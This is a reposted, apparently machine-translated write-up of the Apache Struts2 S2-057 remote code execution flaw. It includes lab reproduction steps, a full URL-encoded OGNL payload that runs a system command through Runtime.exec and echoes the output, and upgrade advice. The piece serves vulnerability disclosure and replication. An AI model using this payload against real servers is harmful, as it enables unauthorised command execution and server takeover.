Website Apache Environment s2-057 exploit POC Remote execution Command Vulnerability replication

Source: Internet
Author: User

s2-057 vulnerability, was exposed on August 22, 2018, the Struts2 057 flaw in the remote execution system commands, especially the use of Linux system, Apache environment, the impact of a large scope, high harm, if the XXX by the use of direct access to the server administrator rights, Web site data is tampered with and database theft occurs.

At present we sine security to the s2-057 vulnerability test, found that the affected version is Apache Struts 2.3–apachestruts2.3.34, Apache struts2.5–apache Struts2.5.16 series version. The official Apache has urgently fixed the s2-057 bug.

Through foreign exposure of the loophole POC, we introduce the next Struts2 vulnerability to how to use:

s2-057 vulnerability generated in the Web site configuration XML, there is a namespace value, the value does not do a detailed security filtering results can be written to the XML, especially the URL tag value is not a wildcard filter, resulting in the ability to execute remote code, as well as system commands to the server system.

We first set up a struts2 environment, find a Windows Server, use one-click Deployment Tools to deploy a test environment, Vulhub environment is also set up as follows:

The following is the process of exploiting and reproducing Struts2 vulnerabilities:

Visit website 192.168.0.3:7080/struts2/${(sine+sine)}/actionchain.action

Change the contents of ${(Sine+sine)} to exp,exp content as follows:

%24%7b (%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%23a%3d%40java.lang.runtime%40getruntime () . EXEC (%27calc%27). getInputStream ()%2c%23b%3dnew+java.io.inputstreamreader (%23a)%2c%23c%3dnew++ Java.io.BufferedReader (%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read (%23d)%2c%23jas502n%3d+% 40org.apache.struts2.servletactioncontext%40getresponse (). Getwriter ()%2c%23jas502n.println (%23d+)%2c% 23jas502n.close ())%7d/actionchain.action

Copy the exp content to the browser execution and discover that the server will run the calculator directly such as:

s2-057 Bug Fix Recommendations:

Upgrade to the latest version of Apache struts 2.3.35 or the latest version of Apache struts 2.5.17, directly upgrade can be officially done by the bug patch, fully compatible.

Website Apache Environment s2-057 exploit POC Remote execution Command Vulnerability replication

Related Article

Cloud Intelligence Leading the Digital Future

Alibaba Cloud ACtivate Online Conference, Nov. 20th & 21st, 2019 (UTC+08)

Register Now >

Starter Package

SSD Cloud server and data transfer for only $2.50 a month

Get Started >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.